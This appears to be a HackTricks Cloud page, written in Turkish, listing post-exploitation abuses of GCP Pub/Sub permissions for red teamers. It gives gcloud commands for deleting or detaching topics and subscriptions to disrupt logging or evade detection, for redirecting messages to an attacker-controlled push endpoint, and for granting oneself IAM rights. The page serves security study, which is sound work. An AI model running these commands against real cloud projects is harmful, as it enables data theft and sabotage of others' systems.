GCP - Pub/Sub Post Exploitation

AWS Hacking'i öğrenin ve pratik yapın:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking'i öğrenin ve pratik yapın: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

Pub/Sub

Pub/Sub hakkında daha fazla bilgi için aşağıdaki sayfayı kontrol edin:

`pubsub.topics.publish`

Bir konuda bir mesaj yayınlayın, beklenmedik veriler göndermek ve beklenmedik işlevleri tetiklemek veya zafiyetleri istismar etmek için kullanışlıdır:

# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"

`pubsub.topics.detachSubscription`

Bir aboneliğin mesaj almasını önlemek için faydalıdır, belki de tespiti önlemek için.

gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>

`pubsub.topics.delete`

Bir aboneliğin mesaj almasını önlemek için faydalıdır, belki de tespiti önlemek için. Bir konuya bağlı abonelikler olsa bile bir konuyu silmek mümkündür.

gcloud pubsub topics delete <TOPIC NAME>

`pubsub.topics.update`

Bu izni, konuyu bozmak için bazı ayarları güncellemek için kullanın, örneğin --clear-schema-settings, --message-retention-duration, --message-storage-policy-allowed-regions, --schema, --schema-project, --topic-encryption-key...

`pubsub.topics.setIamPolicy`

Önceki saldırılardan herhangi birini gerçekleştirmek için kendinize izin verin.

`pubsub.subscriptions.create,pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

Bir web sunucusundaki tüm mesajları alın:

# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>

Bir abonelik oluşturun ve bunu mesajları çekmek için kullanın:

# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>

# You also need pubsub.subscriptions.consume for this
gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted

`pubsub.subscriptions.delete`

Bir aboneliği silmek, bir günlük işleme sistemini veya benzeri bir şeyi bozmak için faydalı olabilir:

gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>

`pubsub.subscriptions.update`

Bu izni, mesajların erişebileceğiniz bir yerde (URL, Big Query tablosu, Bucket) saklanması için bazı ayarları güncellemek veya sadece bunu bozmak için kullanın.

gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>

`pubsub.subscriptions.setIamPolicy`

Önceki yorumlanan saldırıları gerçekleştirmek için gerekli izinleri kendinize verin.

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

Bir şemayı bir konuya ekleyin, böylece mesajlar onu karşılamaz ve bu nedenle konu bozulur. Eğer hiç şema yoksa, bir tane oluşturmanız gerekebilir.

schema.json

{
"namespace": "com.example",
"type": "record",
"name": "Person",
"fields": [
{
"name": "name",
"type": "string"
},
{
"name": "age",
"type": "int"
}
]
}

# Attach new schema
gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--schema=projects/<project-name>/schemas/<topic-id> \
--message-encoding=json

`pubsub.schemas.delete`

Bu, bir şemayı silmek gibi görünebilir, böylece şemaya uymayan mesajlar gönderebilirsiniz. Ancak, şema silineceği için hiçbir mesaj aslında konuya girmeyecek. Bu nedenle bu ANLAMSIZDIR:

gcloud pubsub schemas delete <SCHEMA NAME>

`pubsub.schemas.setIamPolicy`

Önceki yorumlanan saldırıları gerçekleştirmek için gereken izinleri kendinize verin.

`pubsub.snapshots.create`, `pubsub.snapshots.seek`

Bu, tüm onaylanmamış mesajların bir anlık görüntüsünü oluşturacak ve bunları aboneliğe geri koyacaktır. Bir saldırgan için çok faydalı değil ama burada:

gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME

HackTricks'i Destekleyin

abonelik planlarını kontrol edin!
💬 Discord grubuna veya telegram grubuna katılın ya da Twitter'da 🐦 @hacktricks_live'i takip edin.**
Hacking ipuçlarını paylaşmak için HackTricks ve HackTricks Cloud github reposuna PR gönderin.

PreviousGCP - Monitoring Post Exploitation NextGCP - Secretmanager Post Exploitation

Last updated 3 days ago

Pub/Sub

pubsub.topics.publish

pubsub.topics.detachSubscription

pubsub.topics.delete

pubsub.topics.update

pubsub.topics.setIamPolicy

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

pubsub.subscriptions.delete

pubsub.subscriptions.update

pubsub.subscriptions.setIamPolicy

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

pubsub.schemas.delete

pubsub.schemas.setIamPolicy

pubsub.snapshots.create, pubsub.snapshots.seek

Pub/Sub

pubsub.topics.publish

pubsub.topics.detachSubscription

pubsub.topics.delete

pubsub.topics.update

pubsub.topics.setIamPolicy

pubsub.subscriptions.create,pubsub.topics.attachSubscription , (pubsub.subscriptions.consume)

pubsub.subscriptions.delete

pubsub.subscriptions.update

pubsub.subscriptions.setIamPolicy

pubsub.schemas.attach, pubsub.topics.update,(pubsub.schemas.create)

pubsub.schemas.delete

pubsub.schemas.setIamPolicy

pubsub.snapshots.create, pubsub.snapshots.seek

`pubsub.topics.publish`

`pubsub.topics.detachSubscription`

`pubsub.topics.delete`

`pubsub.topics.update`

`pubsub.topics.setIamPolicy`

`pubsub.subscriptions.create,pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

`pubsub.subscriptions.delete`

`pubsub.subscriptions.update`

`pubsub.subscriptions.setIamPolicy`

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

`pubsub.schemas.delete`

`pubsub.schemas.setIamPolicy`

`pubsub.snapshots.create`, `pubsub.snapshots.seek`

`pubsub.topics.publish`

`pubsub.topics.detachSubscription`

`pubsub.topics.delete`

`pubsub.topics.update`

`pubsub.topics.setIamPolicy`

`pubsub.subscriptions.create,pubsub.topics.attachSubscription` , (`pubsub.subscriptions.consume`)

`pubsub.subscriptions.delete`

`pubsub.subscriptions.update`

`pubsub.subscriptions.setIamPolicy`

`pubsub.schemas.attach`, `pubsub.topics.update`,(`pubsub.schemas.create`)

`pubsub.schemas.delete`

`pubsub.schemas.setIamPolicy`

`pubsub.snapshots.create`, `pubsub.snapshots.seek`